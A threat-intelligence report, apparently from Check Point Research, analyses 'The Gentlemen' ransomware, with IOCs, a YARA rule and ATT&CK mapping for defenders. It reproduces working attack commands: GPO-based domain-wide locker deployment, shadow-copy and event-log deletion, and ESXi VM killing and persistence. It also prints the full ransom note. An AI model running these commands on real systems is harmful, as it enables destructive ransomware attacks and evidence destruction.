  Import-Module ActiveDirectory -ErrorAction SilentlyContinue
  Import-Module GroupPolicy -ErrorAction SilentlyContinue

  Write-Host "[+] Getting domain info..."
  try {
      $Domain   = (Get-ADDomain).DNSRoot
      $DomainDN = (Get-ADDomain).DistinguishedName
      Write-Host "[+] Domain from AD: $Domain"
  } catch {
      try {
          $Domain   = (Get-WmiObject Win32_ComputerSystem).Domain
          $DomainDN = "DC=" + ($Domain -replace '\\.',',DC=')
          Write-Host "[+] Domain from WMI: $Domain"
      } catch {
          $Domain   = $env:USERDNSDOMAIN
          $DomainDN = "DC=" + ($Domain -replace '\\.',',DC=')
          Write-Host "[+] Domain from env: $Domain"
      }
  }

  Write-Host "[+] Copying locker to NETLOGON..."
  $ExePath = "\\\\$Domain\\NETLOGON\\<exe>"
  Copy-Item -Path "<exe>" -Destination $ExePath -Force -ErrorAction SilentlyContinue

  Write-Host "[+] Creating GPO..."
  $guid = [guid]::NewGuid().ToString().ToUpper()
  New-GPO -Name "<gpo_name>" -Comment "System Update" -ErrorAction SilentlyContinue | Out-Null
  New-GPLink -Name "<gpo_name>" -Target $DomainDN -ErrorAction SilentlyContinue | Out-Null

  $GpoScheduledPath = "\\\\$Domain\\SYSVOL\\$Domain\\Policies\\{$guid}\\Machine\\Preferences\\ScheduledTasks"
  New-Item -ItemType Directory -Path $GpoScheduledPath -Force | Out-Null

  $TaskXmlPath = "$env:TEMP\\ScheduledTasks.xml"
  $TaskName    = "SystemUpdate"

  @"
  <ScheduledTasks clsid="{CC63F200-7309-4ba0-B154-A71CD118DBCC}">
    <ImmediateTaskV2 clsid="{9756B581-76EC-4169-9AFC-0CA8D43ADB5F}"
        name="$TaskName" image="0" changed="<timestamp>" uid="<uid>"
        userContext="0" removePolicy="0">
      <Properties action="C" name="$TaskName"
          runAs="NT AUTHORITY\\System" logonType="S4U"/>
      ...
      <BootTrigger><Enabled>true</Enabled></BootTrigger>
      <RegistrationTrigger><Enabled>true</Enabled></RegistrationTrigger>
      <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>
      <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>
      <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>
      <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>
    </ImmediateTaskV2>
  </ScheduledTasks>
  "@ | Out-File -Encoding UTF8 -FilePath $TaskXmlPath -Force

  Copy-Item -Path $TaskXmlPath -Destination "$GpoScheduledPath\\ScheduledTasks.xml" -Force

  if (!(Test-Path $GpoScheduledPath)) {
      # path creation guard
  }

  $comps = Get-ADComputer -Filter * | Select-Object -ExpandProperty Name
  foreach ($_ in $comps) {
      Invoke-GPUpdate -Computer $_.name -RandomDelayInMinutes 0
          -Force -ErrorAction SilentlyContinue
      Invoke-Command -ComputerName $comp -ScriptBlock { gpupdate /force }
          -ErrorAction SilentlyContinue
  }

Drive Enumeration

For drive enumeration, the malware uses two techniques to identify available volumes:

  1. PowerShell‑based discovery, using the following command.
  2. Brute‑force drive letter scan, iterating from A: to Z: and calling os.Stat on each path to determine whether it is a valid drive.
powershell -NoProfile -Command "$volumes=@();
$volumes += Get-WmiObject -Class Win32_Volume |
    Where-Object { $_.Name -like ':\\' } |
    Select-Object -ExpandProperty Name;
try {
    $volumes += Get-ClusterSharedVolume |
        ForEach-Object { $_.SharedVolumeInfo.FriendlyVolumeName }
} catch {}
$volumes"

Network Enumeration

In order to enumerate network drives the ransomware executes a sequence of Windows commands that force-enable network discovery and related services, making the machine visible and reachable on the local network.

 sc config fdrespub start=auto
 sc start  fdrespub
 sc config fdPHost  start=auto
 sc start  fdPHost
 sc config SSDPSRV  start=auto
 sc start  SSDPSRV
 sc config upnphost start=auto
 sc start  upnphost
 netsh advfirewall firewall set rule group="Network Discovery" new enable=Yes
 powershell -Command Get-NetFirewallRule -DisplayGroup "Network Discovery" | Enable-NetFirewallRule

Then loads dynamically mpr.dll and by using the Windows API functions enumerates the networks shares:

  • WNetOpenEnumW
  • WNetEnumResourceW
  • WNetCloseEnum

Directories, Filenames and Extensions Exclusion

As with many other ransomware families, this one also excludes specific directories, filenames, and file extensions from encryption, ensuring that the system remains at least partially usable after the attack.

Excluded Directories:

"c:\\\\windows", "system volume information", "c:\\\\intel", "admin$", "ipc$", "! Cynet Ransom Protection(DON\\'T DELETE)", "sysvol", "netlogon", "$windows.~ws", "application data", "mozilla", "c:\\\\program files\\\\microsoft", "c:\\\\program files (x86)\\\\microsoft", "c:\\\\program files (x86)\\\\intel", "$windows.~bt", "msocache", "WinSxS", "$Recycle.Bin", "c:\\\\program files\\\\windows", "c:\\\\program files (x86)\\\\windows", "c:\\\\program files\\\\intel", "tor browser", "boot", "config.msi", "google", "System32", "perflogs", "appdata", "windows.old"

Excluded Filenames:

desktop.ini, autorun.ini, ntldr, bootsect.bak, thumbs.db, boot.ini, ntuser.dat, iconcache.db, bootfont.bin, pagefile.sys, ntuser.ini, ntuser.dat.log, autorun.inf, bootmgr, hiberfil.sys, bootmgr.efi, bootmgfw.efi, #recycle, README-GENTLEMEN.txt"c:\\\\windows", "system volume information", "c:\\\\intel", "admin$", "ipc$", "! Cynet Ransom Protection(DON\\'T DELETE)", "sysvol", "netlogon", "$windows.~ws", "application data", "mozilla", "c:\\\\program files\\\\microsoft", "c:\\\\program files (x86)\\\\microsoft", "c:\\\\program files (x86)\\\\intel", "$windows.~bt", "msocache", "WinSxS", "$Recycle.Bin", "c:\\\\program files\\\\windows", "c:\\\\program files (x86)\\\\windows", "c:\\\\program files\\\\intel", "tor browser", "boot", "config.msi", "google", "System32", "perflogs", "appdata", "windows.old"

Excluded Extensions:

hemepack, nls, diapkg, msi, lnk, exe, scr, bat, drv, rtp, msp, prf, msc, ico, key, ocx, hosts, diagcab, diagcfg, pdb, wpx, hlp, icns, rom, dll, msstyles, mod, ps1, ics, hta, bin, cmd, ani, 386, lock, cur, idx, sys, com, deskthemepack, shs, theme, mpa, gif, mp3, nomedia, spl, cpl, adv, icl, msu

Shadow Copy & Logs Deletion

During execution, the ransomware attempts to delete shadow copies, which are a primary mechanism for recovering encrypted files:

  • vssadmin delete shadows /all /quiet
  • wmic shadowcopy delete
  • rd /s /q C:\\$Recycle.Bin

In addition to shadow copies, the ransomware also deletes various log files. These logs typically contain authentication events, process and service creation events, and traces of lateral movement. The destruction of these artifacts clearly aims to remove forensic evidence of the intrusion and hinder post-incident investigation.

wevtutil cl System
wevtutil cl Application
wevtutil cl Security
del /f /q C:\\Windows\\Prefetch\\*.*
del /f /q C:\\ProgramData\\Microsoft\\Windows Defender\\Support\\*.*
del /f /q %SystemRoot%\\System32\\LogFiles\\RDP*\\*.*

Free Space Wiping

When the threat actor executes the ransomware with the --wipe argument, the malware additionally attempts to wipe free disk space. It creates a file named wipefile.tmp on each targeted drive and writes 64 MB chunks of data to it until all free space is exhausted. This process overwrites previously deleted file content that could otherwise be recovered using forensic tools.

Background Image Change

If the --silent argument is not specified, the ransomware replaces the desktop background with an embedded image. The image resource is written to %TEMP%\\gentlemen.bmp, and the malware then calls SystemParametersInfoW to set it as the desktop wallpaper.

File Encryption

Before encryption begins, the ransomware checks whether the file size exceeds 0x100000 (1,048,576 bytes, or 1 MB). Files of 1 MB or smaller are routed to the small file function, while files larger than 1 MB are routed to the large file function.

Regardless of size, the key derivation process is identical for both paths. The ransomware generates a random 32-byte ephemeral private key. Using X25519 (the Diffie–Hellman primitive over Curve25519), it derives two values: first, the ephemeral public key by multiplying the private key with the curve basepoint, and second, a shared secret by combining the ephemeral private key with the attacker’s public key. The ephemeral public key is not secret and will later be stored in the file, while the shared secret remains only in memory. Key material for encryption is then constructed directly from these values. The ephemeral public key is used as the 32-byte symmetric key, while the first 24 bytes of the shared secret (derived with the attacker’s public key) are used as the nonce.

For small files (less than 1MB) the contents are encrypted using XChaCha20, a stream cipher, which XORs the plaintext with a keystream to produce ciphertext of identical length. The original file is overwritten in place with this ciphertext.

For large files larger than 1 MB, the encryption process changes depending on optional speed mode arguments that control how much of the file is actually encrypted. Instead of processing the entire file, the algorithm only encrypts a small portion of it. In fast mode about 9 percent of the file is encrypted. In superfast mode about 3 percent is encrypted. In ultrafast mode only about 1 percent of the file is affected. The encrypted regions are selected across the file and processed in chunks of about 64 KB. Each chunk is read, encrypted using XChaCha20, and written back to the same position in the file. After encryption, the function appends a footer to the file containing the string --eph--, followed by the base64-encoded ephemeral public key and a newline. This is followed by a marker section --marker--GENTLEMEN\\n and a final GENTLEMEN sentinel. The stored ephemeral public key allows the attacker, who possesses the corresponding private key, to recompute the shared secret and reconstruct the nonce, enabling decryption of the file. If any of the speed-increasing arguments (fast, superfast, or ultrafast) were specified during large file encryption, the selected argument is also appended to the end of the file.

--eph--$BASE64--marker--GENTLEMEN\nGENTLEMEN--fast--\n

The attacker’s decryptor obtains the base64 value from the header (--eph-- field), decodes it to get the ephemeral public key, and uses it directly as the ChaCha20 key. It then recomputes sharedSecret = X25519(attacker_privKey, ephemeralPubKey) using the attacker’s own private key, and uses the first 24 bytes of sharedSecret2 as the ChaCha20 nonce. With the key and nonce recovered, it decrypts the encrypted files.


The Gentlemen ESXi Variant

Latest ELF variant of The Gentlemen ransomware remains undetected by the majority of the Antivirus systems as seems in VirusTotal. The incapability to trigger and execute the malicious code due to the --password requirement possibly affects the detection results, even though for Windows samples this does not appear to be an issue.

Figure 8 — VirusTotal detection rate.

Command Line Arguments

The majority of the arguments functionalities are observed as well in the ELF variant of The Gentlemen ransomware.

Usage: %s --password PASS --path DIR [--ignore VMS] [--T MIN] [--fast] [--superfast] [--ultrafast]

Main Flags 
  --password PASS         Access password (required)
  --path DIR              Target directories, comma-separated (required)
                          Example:  --path /vmfs/
                          Example2: --path "/vmfs/,/datastore/,/mnt/storage"
  --ignore VMS            VM display names to ignore, comma-separated (optional)
                          Example:  --ignore DomainController
                          Example2: --ignore "DomainController,Backup Server"
  --T, --timer MIN        Delay before start in minutes (optional)
                          Example:  --T 15
                          Example2: --timer 15

Speed Flags (can't be mixed) 
  --fast                  Lock 9 percent of file (optional)
  --superfast             Lock 3 percent of file (optional)
  --ultrafast             Lock 1 percent of file (optional)

[+]

The ESXi variant exposes fewer functionalities than the Windows variant, as many features present in the Windows version are not required on ESXi systems.

Flag / ArgumentWindowsESXi
--password PASSAccess password (required)Access password (required)
--path DIRS / DIRComma-separated list of target directories/disks (optional). Example: --path "C:\\,D:\\,\\\\nas\\share"Target directories, comma-separated (required).
Example: --path "/vmfs/,/datastore/,/mnt/storage"
--T MINDelay before start, in minutes (optional)Delay before start in minutes (optional)
--timer $MINNot presentAlias for delay before start in minutes (optional)
--systemRun as SYSTEM; encrypt only local drivesNot present
--sharesEncrypt only mapped network drives and UNC shares in session contextNot present
--fullTwo-phase: --system + --shares (“Best practice”)Not present
--spread $CREDSLateral movement: "domain/user:pass" or "" for current sessionNot present
--gpoDeploy via Group Policy to all domain computers (run on DC)Not present
--silentSilent mode: do not rename/retime files; no wallpaper changeNot present
--keepDo not self-delete after encryptionNot present
--wipeWipe free space after encryptionNot present
--ignore VMSNot presentVM display names to ignore, comma-separated.
Example: --ignore "DomainController,Backup Server"
--fast9 percent crypt. (optional)Lock 9 percent of file (optional)
--superfast3 percent crypt. (optional)Lock 3 percent of file (optional)
--ultrafast1 percent crypt. (optional)Lock 1 percent of file (optional)

The minimum required command‑line for Linux Gentlemen ransomware execution is:

$process_name --password $pass --path $path(s)

VM & Processes Termination

Ransomware operators shut down virtual machines on an ESXi host to make their attack more effective and efficient. By powering off the VMs, they release locks on virtual disk files, allowing those files to be encrypted more reliably and with less risk of interference or corruption. This also disables any security tools running inside the guest systems, reducing the chance of detection or response.

The locker performs a controlled shutdown of all virtual machines on a VMware ESXi host. It first lists all registered VMs and iterates through them to issue a graceful power-off command (optionally skipping specified VMs). After a short wait to allow clean shutdowns, it checks for any remaining running VM processes using esxcli. If any VMs are still active, it forcefully terminates them by killing their associated world processes. In effect, it ensures that all VMs are stopped, using escalation from graceful shutdown to hard kill only when necessary.

# Enumerate all registered VMs (popen, output parsed line by line)
vim-cmd vmsvc/getallvms | tail -n +2

# Power off each VM gracefully (one system() call per VM, skipping --ignore list)
vim-cmd vmsvc/power.off <vmid> > /dev/null 2>&1

# After 8-second sleep: enumerate still-running VM processes (popen)
esxcli --formatter=csv vm process list | tail -n +2

# Force-kill any remaining VM processes by world-id (one per process)
esxcli vm process kill --type=force --world-id=<world_id> > /dev/null 2>&1

Persistence

The ransomware copies itself to /bin/.vmware-authd mimicking a legitimate VMware daemon.

cp -f '<self>' '/bin/.vmware-authd' 2>/dev/null && chmod +x '/bin/.vmware-authd'

Then creates a script file that ESXi runs at boot.

mkdir -p /etc/rc.local.d 2>/dev/null; \\
echo '#!/bin/sh' > '/etc/rc.local.d/local.sh'; \\
echo 'sleep 30 && /bin/.vmware-authd <original_argv> &' >> '/etc/rc.local.d/local.sh'; \\
chmod +x '/etc/rc.local.d/local.sh'

Adds a second persistence layer via crontab. At every reboot, after a 60-second delay, the ransomware relaunches via the hidden binary with the original arguments.

echo '@reboot sleep 60 && /bin/.vmware-authd <original_argv>' | crontab - 2>/dev/null

Pre-Encryption Preparation

The ransomware modifies a VMware ESXi host to prepare the storage layer for fast, consistent disk writes and then disables automatic VM recovery. It increases the VMFS write buffer capacity and adjusts the flush interval to control how data is committed to disk, then forces synchronous writes across all VMFS datastores by briefly creating and deleting eager-zeroed thick disks. Finally, it clears and disables the VM autostart configuration so virtual machines will not restart automatically after a reboot.

# Maximize VMFS write buffer capacity (speeds up encryption throughput)
esxcfg-advcfg -s 32768 /BufferCache/MaxCapacity > /dev/null 2>&1

# Reduce buffer flush interval (forces faster disk commit)
esxcfg-advcfg -s 20000 /BufferCache/FlushInterval > /dev/null 2>&1

# Create eagerzeroedthick disk on every VMFS-5 datastore (forces buffer flush before encryption — ensures plaintext is written to disk)
for I in $(esxcli storage filesystem list | grep 'VMFS-5' | awk '{print $1}'); do \\
  vmkfstools -c 10M -d eagerzeroedthick $I/eztDisk > /dev/null 2>&1; \\
  vmkfstools -U $I/eztDisk > /dev/null 2>&1; \\
done 2>&1

# Same as above for VMFS-6 datastores
for I in $(esxcli storage filesystem list | grep 'VMFS-6' | awk '{print $1}'); do \\
  vmkfstools -c 10M -d eagerzeroedthick $I/eztDisk > /dev/null 2>&1; \\
  vmkfstools -U $I/eztDisk > /dev/null 2>&1; \\
done 2>&1

# Clear ESXi VM autostart configuration (prevents VMs from restarting)
vim-cmd hostsvc/autostartmanager/clear_autostart > /dev/null 2>&1

# Disable autostart manager entirely
vim-cmd hostsvc/autostartmanager/enable_autostart 0 > /dev/null 2>&1

Directories, Filenames and Extensions Exclusion

The ransomware implements a targeted exclusion list to avoid encrypting critical components of the underlying VMware ESXi / Linux-based operating system, as well as associated virtualization and boot infrastructure.

Directories:

/boot/, /proc/, /sys/, /run/, /dev/, /lib/, /etc/, /bin/, /mbr/, /lib64/, /vmware/lifecycle/, /vdtc/, /healthd/

File types:

vmsd, sf, vmx~, lck, vmx, nvram, v00, v01, v02, v03, v04, v05, v06, v07, v08, v09, b00, b01, b02, b03, b04, b05, b06, b07, b08, b09, t00, t01, t02, t03, t04, t05, t06, t07, t08, t09, locker, unlocker, .go, .exe

Files:

initrd, vmlinuz, basemisc.tgz, README-GENTLEMEN.txt, boot.cfg, bootpart.gz, features.gz, imgdb.tgz, jumpstrt.gz, onetime.tgz, state.tgz, useropts.gz


Conclusion

The activity surrounding The Gentlemen RaaS underscores how quickly a well‑designed affiliate program can evolve from newcomer to a high‑impact ecosystem player. By combining a versatile, multi‑platform locker set with built‑in lateral movement, Group Policy–based mass deployment, and strong defense‑evasion capabilities, the operation enables even moderately skilled affiliates to execute enterprise‑scale intrusions with ransomware detonation as the final stage.

The observed use of SystemBC alongside Cobalt Strike, and the discovery of a botnet with more than 1,570 likely corporate victims, further highlights that The Gentlemen affiliates are not operating in isolation, but are actively integrating into a broader toolchain of mature, post‑exploitation frameworks and proxy infrastructure. Organizations should therefore treat The Gentlemen not as an isolated family, but as part of a wider, modular intrusion ecosystem where initial access, post‑exploitation, and encryption capabilities can be rapidly recombined and reused across campaigns.


Indicators of Compromise

DescriptionValue
Cobalt Strike C&C91.107.247[.]163
SystemBC992c951f4af57ca7cd8396f5ed69c2199fd6fd4ae5e93726da3e198e78bec0a5
SystemBC C&C45.86.230[.]112
The Gentlemen Windows025fc0976c548fb5a880c83ea3eb21a5f23c5d53c4e51e862bb893c11adf712a
22b38dad7da097ea03aa28d0614164cd25fafeb1383dbc15047e34c8050f6f67
2ed9494e9b7b68415b4eb151c922c82c0191294d0aa443dd2cb5133e6bfe3d5d
3ab9575225e00a83a4ac2b534da5a710bdcf6eb72884944c437b5fbe5c5c9235
48d9b2ce4fcd6854a3164ce395d7140014e0b58b77680623f3e4ca22d3a6e7fd
62c2c24937d67fdeb43f2c9690ab10e8bb90713af46945048db9a94a465ffcb8
860a6177b055a2f5aa61470d17ec3c69da24f1cdf0a782237055cba431158923
87d25d0e5880b3b5cd30106853cbfc6ef1ad38966b30d9bd5b99df46098e546c
8c87134c1b45e990e9568f0a3899b0076f94be16d3c40fa824ac1e6c6ee892db
91415e0b9fe4e7cbe43ec0558a7adf89423de30d22b00b985c2e4b97e75076b1
994d6d1edb57f945f4284cc0163ec998861c7496d85f6d45c08657c9727186e3
9f61ff4deb8afced8b1ecdc8787a134c63bde632b18293fbfc94a91749e3e454
a7a19cab7aab606f833fa8225bc94ec9570a6666660b02cc41a63fe39ea8b0ad
b67958afc982cafbe1c3f114b444d7f4c91a88a3e7a86f89ab8795ac2110d1e6
c46b5a18ab3fb5fd1c5c8288a41c75bf0170c10b5e829af89370a12c86dd10f8
c7f7b5a6e7d93221344e6368c7ab4abf93e162f7567e1a7bcb8786cb8a183a73
ec368ae0b4369b6ef0da244774995c819c63cffb7fd2132379963b9c1640ccd2
efaf8e7422ffd09c7f03f1a5b4e5c2cc32b05334c18d1ccb9673667f8f43108f
f736be55193c77af346dbe905e25f6a1dee3ec1aedca8989ad2088e4f6576b12
fc75ed2159e0c8274076e46a37671cfb8d677af9f586224da1713df89490a958
Embedded binaries (psexesvc.exe/psexec.exe)cc14df781475ef0f3f2c441d03a622ea67cd86967526f8758ead6f45174db78e
078163d5c16f64caa5a14784323fd51451b8c831c73396b967b4e35e6879937b
gentlemen.bmpfe1033335a045c696c900d435119d210361966e2fb5cd1ba3382608cfa2c8e68
The Gentlemen Linux5dc607c8990841139768884b1b43e1403496d5a458788a1937be139594f01dca
788ba200f776a188c248d6c2029f00b5d34be45d4444f7cb89ffe838c39b8b19
1eece1e1ba4b96e6c784729f0608ad2939cfb67bc4236dfababbe1d09268960c


Yara Rule

rule thegentlemen_ransomware
{
    meta:
        author = "@Tera0017/Check Point Research"
        description = "The Gentlemen Ransomware written in GO."
    strings:
        $string1 = "Silent mode (don't rename files)" ascii
        $string2 = "Encrypt only mapped and UNC network shares" ascii
        $string3 = "README-GENTLEMEN.txt" ascii
        $string4 = "gentlemen.bmp" ascii
        $string5 = "gentlemen_system" ascii
        $string6 = "[+] Encryption started. Going background..." ascii
        $string7 = "[+] FULL Encryption started" ascii
    condition:
        uint16(0) == 0x5A4D and 4 of them
}


Ransomware Note – README-GENTLEMEN.txt

Windows Version:

{VICTIM_ID} {VICTIM}= YOUR ID

Gentlemen, your network has been encrypted.

1. Any modification of encrypted files will make recovery impossible. 
2. Only our unique decryption key and software can restore your files. 
   Brute-force, RAM dumps, third-party recovery tools are useless.
   It’s a fundamental mathematical reality. Only we can decrypt your data.
3. Law enforcement, authorities, and “data recovery” companies will NOT help you.
   They will only waste your time, take your money, and block you from recovering your files — your business will be lost.
4. Any attempt to restore systems, or refusal to negotiate, may lead to irreversible wipe of all data and your network.
5. We have exfiltrated all your confidential and business data (including NAS, clouds, etc). 
   If you do not contact us, it will be published on our leak site and distributed to major hack forums and social networks.
   In addition, it will be reported to the relevant data protection authorities and regulators.
   This may result in official investigations, significant fines, and reputational damage for your company.
6. We guarantee 100% file recovery to their original state, bit by bit.
   To demonstrate the quality of our work, you can provide three sample files, and we will restore them free of charge.

TOX CONTACT - RECOVER YOUR FILES
Contact us (add via TOX ID): D527959A7BC728CB272A0DB683B547F079C98012201A48DD2792B84604E8BC29F6E6BDB8003F
Download Tox messenger: <https://tox.chat/download.html>
Contact us (add via Session ID): {SESSION_ID}
Download Session  <https://getsession.org>

СONTACT TO PREVENT DATA LEAK (7 DAYS BEFORE YOUR COMPANY DATA WILL BE PUBLISHED IN OUR BLOG, WITH 239 HOURS REVEAL TIMER)
Check our blog: hxxp://tezwsse5czllksjb7cwp65rvnk4oobmzti2znn42i43bjdfd2prqqkad.onion/ 
Download Tor browser: <https://www.torproject.org/download/>
Follow us on X: hxxps://x.com/TheGentlemen25

Any other means of communication are fake and may be set up by third parties. 
Only use the methods listed in this note or on the specified website.
After adding (us) in Tox or Session, please wait for your request to be processed and stay online.
If you do not receive a reply within 36 hours, create another account and contact us again.
In your first message in chat, immediately provide your ID from the note and the name of your organization. 
Assign one person as contact responsible for all negotiations. Do not create multiple chats.

ESXi Version:

{VICTIM_ID} = YOUR ESXI ID

Gentlemen, your ESXI has been encrypted.

1. Any modification of encrypted files will make recovery impossible. 
2. Only our unique decryption key and software can restore your files. 
   Brute-force, RAM dumps, third-party recovery tools are useless.
   It’s a fundamental mathematical reality. Only we can decrypt your data.
3. Law enforcement, authorities, and “data recovery” companies will NOT help you.
   They will only waste your time, take your money, and block you from recovering your files — your business will be lost.
4. Any attempt to restore systems, or refusal to negotiate, may lead to irreversible wipe of all data and your network.
5. We have exfiltrated all your confidential and business data (including NAS, clouds, etc). 
   If you do not contact us, it will be published on our leak site and distributed to major hack forums and social networks.
   In addition, it will be reported to the relevant data protection authorities and regulators.
   This may result in official investigations, significant fines, and reputational damage for your company.
6. We guarantee 100% file recovery to their original state, bit by bit.
   To demonstrate the quality of our work, you can provide two sample files, and we will restore them free of charge.

TOX CONTACT - RECOVER YOUR FILES
Contact us (add via TOX ID): D2CBA43A1AF6D965432AE11487726DB84D2945CF2CD975D7774B76B54AF052418AC2E59ADA69
Download Tox messenger: <https://tox.chat/download.html>
Contact us (add via Session ID): {SESSION_ID}
Download Session  <https://getsession.org>

СONTACT TO PREVENT DATA LEAK (7 DAYS BEFORE YOUR COMPANY DATA WILL BE PUBLISHED IN OUR BLOG, WITH 239 HOURS REVEAL TIMER)
Check our blog: hxxp://tezwsse5czllksjb7cwp65rvnk4oobmzti2znn42i43bjdfd2prqqkad.onion/ 
Download Tor browser: <https://www.torproject.org/download/>
Follow us on X: <https://x.com/TheGentlemen25>

Any other means of communication are fake and may be set up by third parties. 
Only use the methods listed in this note or on the specified website.


MITRE ATT&CK Matrix

TacticTechnique / Sub‑TechniqueDescription
Initial AccessValid Accounts (T1078)Attacker already active on Domain Controller with Domain Admin privileges; --spread "domain\\user:password" uses harvested domain credentials for remote execution and lateral movement.
Initial AccessExternal Remote Services (T1133(inferred)Initial entry not directly observed; context suggests possible compromise via exposed remote services (e.g., RDP/VPN), but campaign evidence starts post‑compromise on DC.
ExecutionCommand Shell (T1059.003)Widespread cmd.exe /C usage: systeminfowhoamidir c:\\userstype \\\\host\\share\\file.txttaskkillgpupdate /forcenetrd, etc.
ExecutionPowerShell (T1059.001)Defender tampering and firewall changes via PowerShell; internal HTTP download of grand.exe to c:\\programdata\\r.exe; extensive script‑based lateral movement using Invoke-Command and multi‑step PowerShell scripts (SCRIPT_ASCRIPT_G).
ExecutionWindows Management Instrumentation (T1047)wmic /node:<target> process call create "<DEFENDER_SCRIPT_A>" and wmic ... "C:\\Temp\\<exe> <creds>" to execute scripts and lockers on remote hosts.
ExecutionScheduled Task/Job: Scheduled Task (T1053.005)Creation of local and remote tasks: UpdateSystemUpdateUserDefUDefSUpdateGUUpdateGU2UpdateGSUpdateGS2 using schtasks /Create /S <target> ... /Run for execution and persistence.
ExecutionSystem Services: Service Execution (T1569.002)Remote services DefSvcUpdateSvcUpdateSvc2 created and started via sc \\\\<target> create ... and sc \\\\<target> start ... to run ransomware or helper scripts.
ExecutionNative API (T1106)Use of SystemParametersInfoW to set gentlemen.bmp as wallpaper; dynamic loading of mpr.dll and calls to WNetOpenEnumWWNetEnumResourceWWNetCloseEnum to enumerate network shares.
ExecutionUser Execution: Malicious File (T1204.002)Operator‑driven execution of ransomware payloads (r.exeg.exeo.exe, GPO‑deployed locker) on endpoints as final stage of intrusion.
PersistenceScheduled Task/Job: Scheduled Task (T1053.005)Local persistence via schtasks /Create /SC ONSTART /TN UpdateSystem /TR "<exe> <args>" /RU SYSTEM; remote tasks on many hosts ensure repeated execution and durability of the locker.
PersistenceRegistry Run Keys / Startup Folder (T1060)Run key added: reg add HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run /v GupdateU /t REG_SZ /d "<exe>" /f to autostart ransomware in user context.
PersistenceCreate or Modify System Process: Windows Service (T1543.003)Creation of new services (DefSvcUpdateSvcUpdateSvc2) on remote hosts to execute ransomware or helper logic, typically running as SYSTEM.
PersistenceBoot or Logon Autostart Execution: rc.local (T1547.009)ESXi/Linux variant copies itself to /bin/.vmware-authd and configures /etc/rc.local.d/local.sh with sleep 30 && /bin/.vmware-authd <original_argv> & to auto‑run on boot.
PersistenceScheduled Task/Job: Cron (T1053.003)ESXi variant adds cron entry @reboot sleep 60 && /bin/.vmware-authd <original_argv> via crontab -, providing additional boot persistence.
PersistenceBoot or Logon Initialization Scripts (T1037.004)Combined use of rc.local (/etc/rc.local.d/local.sh) and cron @reboot scripts ensures the locker relaunches after ESXi host reboot.
PersistenceIngress Tool Transfer (T1105)--gpo deployment mode copies locker to \\\\<domain>\\NETLOGON\\<exe> and injects ScheduledTasks.xml into GPO path; all domain machines then pull and execute the locker via GPO‑scheduled tasks.
Privilege EscalationValid Accounts (T1078)Stolen Domain Admin and other domain credentials used with PsExec (-u <domain\\user> -p <pass>) and --spread to perform privileged remote execution and lateral movement.
Privilege EscalationScheduled Task/Job: Scheduled Task (T1053.005)Tasks created to run as SYSTEM (/RU SYSTEM) – locally and via GPO – escalate from user to LocalSystem context for file encryption and defense evasion.
Privilege EscalationCreate or Modify System Process: Windows Service (T1543.003)Attackers create new services configured to run under high‑privilege service accounts (usually SYSTEM) on remote hosts to execute ransomware components.
Defense EvasionImpair Defenses: Disable or Modify Tools (T1562.001)Defender disabled and neutered via Set-MpPreference -DisableRealtimeMonitoring $true; exclusions added for C:\\C:\\Temp\\\\<host>\\share$, and the ransomware process; these operations are performed locally and remotely via scripts.
Defense EvasionImpair Defenses: Disable or Modify System Firewall (T1562.004)Firewall disabled globally: netsh advfirewall set allprofiles state offSet-NetFirewallProfile -Profile Domain,Public,Private -Enabled False; firewall service mpssvc is stopped and set to disabled.
Defense EvasionImpair Defenses: Disable or Modify Cloud/Network Security (T1562.007)Attackers enable SMB1 (Enable-WindowsOptionalFeature ... SMB1Protocol), loosen LSA anonymous access (EveryoneIncludesAnonymous=1RestrictAnonymous=0), and set open network shares using net share + icacls, reducing network/segmentation protections.
Defense EvasionIndicator Removal on Host: Clear Windows Event Logs (T1070.001)wevtutil cl Systemwevtutil cl Applicationwevtutil cl Security executed to remove Windows event logs and hinder forensic reconstruction.
Defense EvasionIndicator Removal on Host: File Deletion (T1070.004)Forensic artefacts removed: prefetch (C:\\Windows\\Prefetch\\*.*), Defender logs (C:\\ProgramData\\Microsoft\\Windows Defender\\Support\\*.*), RDP logs (%SystemRoot%\\System32\\LogFiles\\RDP*\\*.*), $Recycle.Bin, plus overwriting free space via wipefile.tmp with 64 MB chunks.
Defense EvasionIndicator Removal on Host: Timestomp (T1070.006(implied)Report notes --silent avoids file renaming and timestamp changes; default behavior implied to alter names/timestamps, hampering timeline reconstruction and signature‑based detection.
Defense EvasionMasquerading: Masquerade Task or Service (T1036.004)ESXi locker placed at /bin/.vmware-authd, masquerading as legitimate VMware vmware-authd daemon.
Defense EvasionMasquerading: Match Legitimate Name or Location (T1036.005)Ransomware components use generic names (r.exeg.exeo.exe) and common locations (C:\\ProgramData\\C:\\Temp\\, admin shares) to blend with normal tools and admin activity.
Defense EvasionHide Artifacts: Hidden Window / Binary (T1564.003)ESXi binary uses a leading dot .vmware-authd to stay hidden; --silent mode on Windows avoids visible UI changes like wallpaper and renaming, running ransomware quietly in the background.
Defense EvasionObfuscated/Encrypted Artifacts (T1027)Per‑file ephemeral X25519 keys and XChaCha20 encryption plus footer markers (`–eph–<base64_ephemeral_pubkey>–marker–GENTLEMEN\nGENTLEMEN[–fast
Credential AccessOS Credential Dumping (T1003)Mimikatz artefacts recovered from memory show dumping of domain credentials and stored secrets from compromised workstations.
Credential AccessCredentials from Password Stores (T1555)Mimikatz dumping likely includes passwords from Windows Credential Manager/password stores, used later for --spread and PsExec.
DiscoverySystem Information Discovery (T1082)cmd.exe /C systeminfo run on compromised hosts to gather OS and hardware information.
DiscoveryAccount Discovery (T1033)cmd.exe /C whoami to confirm identity and context on multiple hosts.
DiscoveryAccount Discovery: Domain Account (T1087.002)net group "Domain Admins" /domain and net group "Enterprise Admins" /domain executed to enumerate domain‑level privileged groups.
DiscoveryDomain Trust Discovery (T1482)nltest /domain_trustsnltest /dclist (implied) to identify domain trust relationships and domain controllers.
DiscoveryRemote System Discovery (T1018)Domain computers enumerated via Get-ADComputer -Filter *; each host pinged to confirm reachability before executing lateral movement steps.
DiscoveryPermission Groups Discovery: Domain Groups (T1069.002)net group "Domain Admins" /domain and similar commands to discover privileged group membership.
DiscoveryNetwork Share Discovery (T1135)mpr.dll dynamically loaded; WNetOpenEnumWWNetEnumResourceWWNetCloseEnum used to enumerate available network shares after enabling network discovery services.
